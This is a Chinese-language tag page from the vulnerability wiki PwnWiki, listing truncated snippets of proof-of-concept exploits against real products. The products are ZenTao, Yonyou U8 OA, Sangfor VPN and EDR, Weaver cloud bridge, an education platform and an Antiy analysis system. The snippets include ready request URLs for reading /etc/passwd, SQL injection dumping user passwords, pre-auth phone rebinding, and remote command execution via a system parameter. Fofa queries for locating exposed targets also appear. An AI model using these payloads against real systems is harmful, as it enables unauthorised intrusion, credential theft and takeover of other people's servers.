禅道 11.6 任意文件读取漏洞
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , POC http://127.0.0.1/zentaopms_11.6/www/api-getModel-file-parseCSV-fileName=/etc/passwd 免费 ...
标签:POC
以下是与标签“POC”相关联的文章
-
-
禅道 11.6版本 SQL注入漏洞
免费、自由、人人可编辑的漏洞库--pwnwiki.com , POC http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user ...
-
用友 U8 OA test.jsp SQL注入漏洞
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Payload /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1)) POC import requ ...
-
深信服 SSL VPN – Pre Auth 修改绑定手机漏洞
免费、自由、人人可编辑的漏洞库--PwnWiki.com , POC https://www.0-sec.org/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessR ...
-
深信服VPN M7.6.1 任意修改绑定手机
免费、自由、人人可编辑的漏洞库--pwnwiki.com , POC https://127.0.0.1/por/changetelnum.csp?apiversion=1 POST: newtel=TARGET_PHONE&ses ...
-
深信服/SANGFOR 终端检测响应平台/EDR RCE漏洞
免费、自由、人人可编辑的漏洞库 , POC: https://x.x.x.x/tool/log/c.php?strip_slashes=system&host=id Fofa语法: title="SANGFOR终端检测响应平台" 免 ...
-
泛微云桥任意文件读取漏洞
免费、自由、人人可编辑的漏洞库--PwnWiki.com , POC http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/pass ...
-
智慧教育平台0day/zh-hant
免费、自由、人人可编辑的漏洞库--PwnWiki.com , Contents 1 FOFA 2 任意文件上传漏洞 2.1 POC 3 未经授权访问漏洞 4 任意用户注册漏洞 5 漏洞利用 6 Getshell FOFA "/Widget/ ...
-
智慧教育平台0day
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , Contents 1 FOFA 2 任意文件上传漏洞 2.1 POC 3 未经授权访问漏洞 4 任意用户注册漏洞 5 漏洞利用 6 Getshell FOFA "/Widget/ ...
-
安天追影威胁分析系统越权访问漏洞/zh-cn
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , 漏洞描述 通过修改返回包内容,可以绕过验证,直接登陆系统,可以查看到部分敏感信息. POC 访问威胁分析系统,抓包一条"/api/user/islogin"的请求,返回包的内容为 ...